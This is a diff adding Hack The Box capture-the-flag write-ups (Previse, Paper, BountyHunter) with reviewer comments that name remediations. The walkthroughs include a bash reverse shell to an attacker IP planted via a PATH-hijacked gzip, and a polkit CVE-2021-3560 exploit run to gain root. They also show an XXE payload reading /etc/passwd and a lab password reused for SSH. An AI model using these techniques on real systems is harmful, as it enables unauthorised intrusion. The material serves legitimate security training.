+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ System information as of Mon May 2 11:24:33 UTC 2022
+
+ System load: 0.0 Processes: 177
+ Usage of /: 54.7% of 4.85GB Users logged in: 0
+ Memory usage: 47% IP address for eth0: 10.129.95.185
+ Swap usage: 0%
+
+
+ 0 updates can be applied immediately.
+
+
+ Last login: Fri Jun 18 01:09:10 2021 from 10.10.10.5
+ m4lwhere@previse:~$ id
+ uid=1000(m4lwhere) gid=1000(m4lwhere) groups=1000(m4lwhere)
+ m4lwhere@previse:~$ cat user.txt
+ 23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to login as the user m4lwhere, and we got the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to get to the root user let's enumerate the box with linpeas.sh, this time as the m4lwhere user:
+
+
+ m4lwhere@previse:~$ wget http://10.10.14.68:9090/linpeas.sh -O /tmp/peas.sh
+ --2022-05-02 11:27:21-- http://10.10.14.68:9090/linpeas.sh
+ Connecting to 10.10.14.68:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 776167 (758K) [application/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[===================================================================================>] 757.98K 1.99MB/s in 0.4s
+
+ 2022-05-02 11:27:22 (1.99 MB/s) - ‘/tmp/peas.sh’ saved [776167/776167]
+
+ m4lwhere@previse:~$ chmod +x /tmp/peas.sh
+ m4lwhere@previse:~$ /tmp/peas.sh
+
+
+
+Looking at the output we see the following:
+
+
+
+And when we run sudo -l we see that our current m4lwhere user can run this script as root:
+
+
+ m4lwhere@previse:~$ sudo -l
+ [sudo] password for m4lwhere:
+ User m4lwhere may run the following commands on previse:
+ (root) /opt/scripts/access_backup.sh
+
+
+
+So let's see what commands are being ran by that script:
+
+
+ m4lwhere@previse:~$ cat /opt/scripts/access_backup.sh
+ #!/bin/bash
+
+ # We always make sure to store logs, we take security SERIOUSLY here
+
+ # I know I shouldnt run this as root but I cant figure it out programmatically on my account
+ # This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
+
+ gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
+ gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
+
+
+
+So in this script the gzip command is not being run with the absolute path. So let's create a new gzip bash script:
+
+
+ m4lwhere@previse:~$ vim gzip
+
+ m4lwhere@previse:~$ cat gzip
+ #!/bin/sh
+ bash -c 'bash -i >& /dev/tcp/10.10.14.68/9002 0>&1'
+
+ m4lwhere@previse:~$ chmod +x gzip
+ m4lwhere@previse:~$ which gzip
+ /bin/gzip
+ m4lwhere@previse:~$ echo $PATH
+ /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
+
+
+
+Now we want our new gzip file to be ran instead of the default /bin/gzip binary, so let's add the current working directory into the PATH variable:
+
+
+ m4lwhere@previse:~$ export PATH=.:$PATH
+ m4lwhere@previse:~$ echo $PATH
+ .:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
+ m4lwhere@previse:~$ which gzip
+ ./gzip
+
+
+
+And now when we run the backup script as the root user we should get reverse shell as the root user on port 9002:
+
+
+ [term1]
+ m4lwhere@previse:~$ sudo /opt/scripts/access_backup.sh
+
+ [term2]
+ [ 10.10.14.68/23 ] [ /dev/pts/24 ] [~/HTB/Previse]
+ → nc -lvnp 9002
+ Connection from 10.129.95.185:59276
+ root@previse:~# id
+ id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@previse:~# cat /root/root.txt
+ cat /root/root.txt
+ 26XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And there you go! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
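Review bot: the authentication bypass on `accounts.php` is shown but never explained, although the cause is visible in the gobuster output: `/accounts.php` answers 302 with `Size: 3994` while `/download.php` and `/logout.php` answer 302 with `Size: 0`, i.e. the script sets the redirect header but keeps executing and sends the full page body, which is why dropping the 302 in Burp is enough. State that, together with the fix (stop script execution after issuing the redirect), so the reader learns the bug and not only the trick. Same for the two later findings: `exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}")` in `logs.php` interpolates raw POST data into a shell command (remediation: allow-list or escape `delim`), and the PATH hijack works only because `access_backup.sh` calls `gzip` by bare name and sudo on this box passes the caller's `PATH` through after `export PATH=.:$PATH` (remediation: call `/bin/gzip` and enforce `secure_path` in sudoers); naming each remediation in one sentence fits the writeup's style. Formatting: `<****?php` / `?****>` in the `config.php` listing are escape residue for `<?php` / `?>`, a stray `` ` `` line precedes "Looking at linpeas.sh's output", and "Then send it:", "Looking at linpeas.sh's output we see that there is a mysql database" and "Looking at the output we see the following:" are each followed by no image, so the sleep-based timing check and both linpeas findings are asserted without evidence. Typos: "downlaod", "arguement", "manmaged", "ran::", "and and also intercept".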
diff --git a/Easy/65.md b/Easy/65.md
new file mode 100644
index 0000000..fd0f3f1
--- /dev/null
+++ b/Easy/65.md
@@ -0,0 +1,451 @@
+# Paper Writeup
+
+
+
+## Introduction :
+
+Paper is an easy box released back in Febuary 2022
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → ping paper.htb
+ PING paper.htb (10.129.136.31) 56(84) bytes of data.
+ 64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=24.9 ms
+ ^C
+ --- paper.htb ping statistics ---
+ 1 packets transmitted, 1 received, 0% packet loss, time 0ms
+ rtt min/avg/max/mdev = 24.883/24.883/24.883/0.000 ms
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → nmap -sCV paper.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-30 20:21 CEST
+ Nmap scan report for paper.htb (10.129.136.31)
+ Host is up (0.028s latency).
+ Not shown: 997 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
+ | 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
+ |_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
+ 80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
+ |_http-title: HTTP Server Test Page powered by CentOS
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
+ |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ 443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
+ |_http-title: HTTP Server Test Page powered by CentOS
+ |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ | tls-alpn:
+ |_ http/1.1
+ |_ssl-date: TLS randomness does not represent time
+ | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
+ | Subject Alternative Name: DNS:localhost.localdomain
+ | Not valid before: 2021-07-03T08:52:34
+ |_Not valid after: 2022-07-08T10:32:34
+ |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running apache 2.4.37 which is most likely running CentOS. When we curl port 80 we see it displays another domain:
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → curl -v http://paper.htb
+ * Trying 10.129.136.31:80...
+ * Connected to paper.htb (10.129.136.31) port 80 (#0)
+ GET / HTTP/1.1
+ Host: paper.htb
+ User-Agent: curl/7.84.0
+ Accept: */*
+
+ Mark bundle as not supporting multiuse
+ HTTP/1.1 403 Forbidden
+ Date: Tue, 30 Aug 2022 18:31:07 GMT
+ Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ X-Backend-Server: office.paper
+ Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
+ ETag: "30c0b-5c5c7fdeec240"
+ Accept-Ranges: bytes
+ Content-Length: 199691
+ Content-Type: text/html; charset=UTF-8
+
+
+
+So we add the domain office.paper to our /etc/hosts file:
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → cat /etc/hosts | grep paper
+ 10.129.136.31 paper.htb office.paper
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → ping office.paper
+ PING paper.htb (10.129.136.31) 56(84) bytes of data.
+ 64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=23.2 ms
+ 64 bytes from paper.htb (10.129.136.31): icmp_seq=2 ttl=63 time=23.0 ms
+
+
+
+let's enumerate for other subdomains using wfuzz (we specify the wordlist we want to use and we hide 403 code responses):
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → wfuzz -u http://office.paper -H "Host: FUZZ.office.paper" -w /bedrock/strata/kali/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hc 403
+ ********************************************************
+ * Wfuzz 3.1.0 - The Web Fuzzer *
+ ********************************************************
+
+ Target: http://office.paper/
+ Total requests: 4989
+
+ =====================================================================
+ ID Response Lines Word Chars Payload
+ =====================================================================
+
+ 000000070: 200 507 L 13015 W 223163 Ch "chat"
+ ^C /usr/lib/python3.10/site-packages/wfuzz/wfuzz.py:79: UserWarning:Finishing pending requests...
+
+ Total time: 5.887163
+ Processed Requests: 192
+ Filtered Requests: 191
+ Requests/sec.: 32.61332
+
+
+
+wfuzz found the chat.office.paper subdomain so let's also add it to our /etc/hosts file, then we browse it:
+
+
+
+And here we find a rocketchat instance. Let's go back to it after we get credentials. We move on back to the http site with the TLD office.paper:
+
+ 
+
+browsing to **http://office.paper/wp-admin** reveals that it is a wordpress site. So we run wpscan:
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → wpscan --url http://office.paper
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.8.22
+
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+ _______________________________________________________________
+
+ [i] Updating the Database ...
+ [i] Update completed.
+
+ [+] URL: http://office.paper/ [10.129.136.31]
+ [+] Started: Tue Aug 30 20:47:20 2022
+
+ Interesting Finding(s):
+
+ [+] Headers
+ | Interesting Entries:
+ | - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
+ | - X-Powered-By: PHP/7.2.24
+ | - X-Backend-Server: office.paper
+ | Found By: Headers (Passive Detection)
+ | Confidence: 100%
+
+ [+] WordPress readme found: http://office.paper/readme.html
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+
+ **[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
+ | Found By: Rss Generator (Passive Detection)
+ | - http://office.paper/index.php/feed/, generator>https://wordpress.org/?v=5.2.3/generator>
+ | - http://office.paper/index.php/comments/feed/, generator>https://wordpress.org/?v=5.2.3/generator>**
+
+ [+] WordPress theme in use: construction-techup
+ | Location: http://office.paper/wp-content/themes/construction-techup/
+ | Last Updated: 2021-07-17T00:00:00.000Z
+ | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
+ | [!] The version is out of date, the latest version is 1.4
+ | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
+ | Style Name: Construction Techup
+ | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
+ | Author: wptexture
+ | Author URI: https://testerwp.com/
+ |
+ | Found By: Css Style In Homepage (Passive Detection)
+ |
+ | Version: 1.1 (80% confidence)
+ | Found By: Style (Passive Detection)
+ | - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'
+
+ [+] Enumerating All Plugins (via Passive Methods)
+
+ [i] No plugins Found.
+
+ [+] Enumerating Config Backups (via Passive and Aggressive Methods)
+ Checking Config Backups - Time: 00:00:00 <****=================================================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
+
+ [i] No Config Backups Found.
+
+ [!] No WPScan API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
+
+ [+] Finished: Tue Aug 30 20:47:25 2022
+ [+] Requests Done: 185
+ [+] Cached Requests: 5
+ [+] Data Sent: 44.421 KB
+ [+] Data Received: 18.75 MB
+ [+] Memory used: 227.438 MB
+ [+] Elapsed time: 00:00:04
+
+So here this wordpress instance is vulnerable to CVE-2019-17671, which is basically a mistake which allows us to view published posts with the following PHP variable: **?static=1** which allows us to see all the other posts:
+
+
+
+here a secret post reveals to us the secret registering link, so let's use it to create an account:
+
+
+
+once we log in, we can see the following info:
+
+
+
+Basically there's a bot called recyclops and we can reach it via DM to type commands:
+
+
+
+We can list files with the command "list"
+
+
+
+And with directory traversal we see that there is a user on the box called "dwight".
+
+
+
+Going just one directory up we see the directory hubot containing a .env file with plaintext credentials: **recyclops/Queenofblad3s!23** , so let's check for password reuse with the user dwight:
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → crackmapexec ssh office.paper -u dwight -p 'Queenofblad3s!23'
+ [*] First time use detected
+ [*] Creating home directory structure
+ [*] Creating default workspace
+ [*] Initializing SMB protocol database
+ [*] Initializing LDAP protocol database
+ [*] Initializing SSH protocol database
+ [*] Initializing MSSQL protocol database
+ [*] Initializing WINRM protocol database
+ [*] Copying default configuration file
+ [*] Generating SSL certificate
+ /usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
+ if result['type'] is not 'searchResEntry':
+ SSH paper.htb 22 office.paper [*] SSH-2.0-OpenSSH_8.0
+ SSH paper.htb 22 office.paper [+] dwight:Queenofblad3s!23
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper]
+ → ssh dwight@office.paper
+ The authenticity of host 'office.paper (10.129.136.31)' can't be established.
+ ED25519 key fingerprint is SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ.
+ This key is not known by any other names
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'office.paper' (ED25519) to the list of known hosts.
+ dwight@office.paper's password:
+ Activate the web console with: systemctl enable --now cockpit.socket
+
+ Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
+ [dwight@paper ~]$ id
+ uid=1004(dwight) gid=1004(dwight) groups=1004(dwight)
+ [dwight@paper ~]$ cat user.txt
+ a0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And we managed to log in and get the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc let's enumerate the possible privesc paths using linpeas.sh:
+
+
+ [term1]
+ [dwight@paper ~]$ which wget curl
+ /usr/bin/wget
+ /usr/bin/curl
+
+ [term2]
+ [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
+ → wget https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
+ --2022-08-30 21:12:52-- https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220830T191251Z&X-Amz-Expires;=300&X-Amz-Signature;=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream [following]
+ --2022-08-30 21:12:53-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220830T191251Z&X-Amz-Expires;=300&X-Amz-Signature;=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream
+ Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ...
+ Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 807205 (788K) [application/octet-stream]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[=======================================================================================================================================================>] 788.29K 4.40MB/s in 0.2s
+
+ 2022-08-30 21:12:53 (4.40 MB/s) - ‘linpeas.sh’ saved [807205/807205]
+
+
+ [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term1]
+ [dwight@paper ~]$ wget 10.10.14.13:9090/linpeas.sh
+ --2022-08-30 15:13:45-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 807205 (788K) [application/x-sh]
+ Saving to: ‘linpeas.sh’
+
+ linpeas.sh 100%[=======================================================================================================================================================>] 788.29K 2.00MB/s in 0.4s
+
+ 2022-08-30 15:13:46 (2.00 MB/s) - ‘linpeas.sh’ saved [807205/807205]
+
+ [dwight@paper ~]$ chmod +x linpeas.sh
+ [dwight@paper ~]$ ./linpeas.sh
+
+
+
+`  
+
+Here we see that there should be a buffer overflow vulnerability with the sudo binary, vulnerability nicknamed "Baron Samedit". To check if it is vulnerable we need to run **sudoedit -s /** and if it returns **sudoedit /: not a regular file** then it is vulnerable:
+
+
+ [dwight@paper ~]$ sudoedit -s /
+ usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...
+
+
+
+It's not, however linpeas.sh also picked up that the VM is vulnerable to CVE-2021-3560, so let's exploit it as follows:
+
+
+ [term1]
+ [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
+ → wget https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
+ --2022-08-30 21:29:20-- https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 2803 (2.7K) [text/plain]
+ Saving to: ‘CVE-2021-3560.py’
+
+ CVE-2021-3560.py 100%[=======================================================================================================================================================>] 2.74K --.-KB/s in 0.001s
+
+ 2022-08-30 21:29:20 (4.58 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803]
+
+
+ [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.129.136.31 - - [30/Aug/2022 21:29:45] "GET /CVE-2021-3560.py HTTP/1.1" 200 -
+
+ [term2]
+ [dwight@paper ~]$ wget http://10.10.14.13:9090/CVE-2021-3560.py
+ --2022-08-30 15:29:44-- http://10.10.14.13:9090/CVE-2021-3560.py
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 2803 (2.7K) [text/x-python]
+ Saving to: ‘CVE-2021-3560.py’
+
+ CVE-2021-3560.py 100%[=======================================================================================================================================================>] 2.74K --.-KB/s in 0s
+
+ 2022-08-30 15:29:44 (123 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803]
+
+ [dwight@paper ~]$ which python python3
+ /usr/bin/which: no python in (/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin)
+ /usr/bin/python3
+ [dwight@paper ~]$ python3 CVE-2021-3560.py
+
+ ##############CVE-2021-3560##############
+ # __________ .__ __ .__ __ #
+ # \______ \____ | | | | _|__|/ |_ #
+ # | ___/ _ \| | | |/ / \ __\ #
+ # | | ( <****_> ) |_| | || | #
+ # |____| \____/|____/__|_ \__||__| #
+ # \/ #
+ # Local Privilege Escalation Exploit #
+ # Author: Salman Asad (@deathflash1411) #
+ #########################################
+
+ [+] User created!
+ [+] Username: flash
+ [+] User ID: 1005
+ [!] Run the below command a few times ( <****10) and login via su - flash
+
+ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye & sleep 0.005s ; kill $!
+ [dwight@paper ~]$
+
+
+
+So let's follow the script's instructions:
+
+
+ [dwight@paper ~]$ python3 CVE-2021-3560.py
+
+ ##############CVE-2021-3560##############
+ [+] User created!
+ [+] Username: flash
+ [+] User ID: 1005
+ [!] Run the below command a few times (<****10) and login via su - flash
+
+ [dwight@paper ~]$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye
+ [dwight@paper ~]$ su - flash
+ Password:
+ [flash@paper ~]$ id
+ uid=1005(flash) gid=1005(flash) groups=1005(flash),10(wheel)
+ [flash@paper ~]$ sudo su
+
+ We trust you have received the usual lecture from the local System
+ Administrator. It usually boils down to these three things:
+
+ #1) Respect the privacy of others.
+ #2) Think before you type.
+ #3) With great power comes great responsibility.
+
+ [sudo] password for flash:
+ [root@paper flash]# id
+ uid=0(root) gid=0(root) groups=0(root)
+ [root@paper flash]# cat /root/root.txt
+ 2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+And that's it! We managed to get the root flag!
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
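Review bot: the conclusion "So here this wordpress instance is vulnerable to CVE-2019-17671" is not backed by the wpscan output directly above it, which states `[!] No WPScan API Token given, as a result vulnerability data has not been output`; say explicitly that the inference comes from the detected `WordPress version 5.2.3`, which predates the 5.2.4 fix. The same sentence describes the bug as letting us view "published posts", but what `?static=1` exposes is private/unpublished content, which is exactly why the secret registration link becomes visible; reword it. Several image embeds in this file are broken (a stray backtick followed by `![]()` with no path, e.g. right after `./linpeas.sh`), so the linpeas findings that "Here we see that there should be a buffer overflow vulnerability with the sudo binary" refers to are never shown; fix the image links or paste the relevant linpeas lines. Minor: the command typed at `[dwight@paper ~]$ dbus-send --system --dest=org.freedesktop.Accounts ...` omits the `& sleep 0.005s ; kill $!` part that the script's own instructions include, while the prose says "let's follow the script's instructions"; either show the command as instructed or add a sentence saying the shortened form was sufficient here.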
diff --git a/Easy/66.md b/Easy/66.md
new file mode 100644
index 0000000..b0e71e6
--- /dev/null
+++ b/Easy/66.md
@@ -0,0 +1,375 @@
+# BountyHunter Writeup
+
+
+
+## Introduction :
+
+BountyHunter is an easy Linux box released back in July 2021
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/BountyHunter]
+ → vim /etc/hosts
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/BountyHunter]
+ → sudo vim /etc/hosts
+ [sudo] password for nothing:
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/BountyHunter]
+ → cat /etc/hosts | grep bounty
+ 10.129.95.166 bountyhunter.htb
+
+ [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/BountyHunter]
+ → nmap -sCV bountyhunter.htb
+ Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-29 16:10 UTC
+ Nmap scan report for bountyhunter.htb (10.129.95.166)
+ Host is up (0.027s latency).
+ Not shown: 998 closed tcp ports (conn-refused)
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 d4:4c:f5:79:9a:79:a3:b0:f1:66:25:52:c9:53:1f:e1 (RSA)
+ | 256 a2:1e:67:61:8d:2f:7a:37:a7:ba:3b:51:08:e8:89:a6 (ECDSA)
+ |_ 256 a5:75:16:d9:69:58:50:4a:14:11:7a:42:c1:b6:23:44 (ED25519)
+ 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
+ |_http-title: Bounty Hunters
+ |_http-server-header: Apache/2.4.41 (Ubuntu)
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.12 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+
+We click "Portal" and it shows us the following:
+
+
+
+So here we see that we can input some text in the fields, so let's intercept it with burpsuite:
+
+ 
+
+So here we see that forwarding the request, once sent adds data to a DB. However let's take a closer look at the data which seems to be a base64 string once b64 decoded:
+
+
+
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → vim data
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → cat data
+ <****?xml version="1.0" encoding="ISO-8859-1"?> <****bugreport> <****title>niihlism
+ <****cwe>cwe
+ <****cvss>10.0
+ <****reward>999999
+ <****/bugreport>
+
+So from here, we can modify the xml data with a payload to print out /etc/passwd:
+
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → vim data
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → cat data
+ <****?xml version="1.0" encoding="ISO-8859-1"?> <****!DOCTYPE nothing [ <****!ELEMENT nothing ANY > <****!ENTITY nihilism SYSTEM "file:///etc/passwd" >]> <****bugreport> <****title> &nihilism;<****/title> <****cwe>cwe <****/cwe> <****cvss>10.0 <**/cvss>
+ <****reward>999999 <****/reward> <****/bugreport>
+
+ [ 10.8.0.3/24 ] [ nowhere ] [~/HTB/BountyHunter]
+ → base64 -w0 data
+ PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4KICA8IURPQ1RZUEUgbmloaWxpc3QgWyAgCiAgPCFFTEVNRU5UIG5paGlsaXNtIEFOWSA+CiAgPCFFTlRJVFkgeHhlIFNZU1RFTSAiZmlsZTovLy9ldGMvcGFzc3dkIiA+XT4KCQk8YnVncmVwb3J0PgoJCTx0aXRsZT5uaWhpbGlzbTwvdGl0bGU+CgkJPGN3ZT5jd2U8L2N3ZT4KCQk8Y3Zzcz4xMC4wPC9jdnNzPgoJCTxyZXdhcmQ+OTk5OTk5PC9yZXdhcmQ+CgkJPC9idWdyZXBvcnQ+Cg==%
+
+Then use the b64 string in the burp repeater, and don't forget to URL encode it by selecting it and pressing CTRL+U, then click send:
+
+
+
+So now we know the users on the system, so let's continue by looking for other files:
+
+
+ [ 10.10.16.14/23 ] [ nowhere ] [~]
+ → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://bountyhunter.htb/ -x php
+ ===============================================================
+ Gobuster v3.3
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://bountyhunter.htb/
+ [+] Method: GET
+ [+] Threads: 50
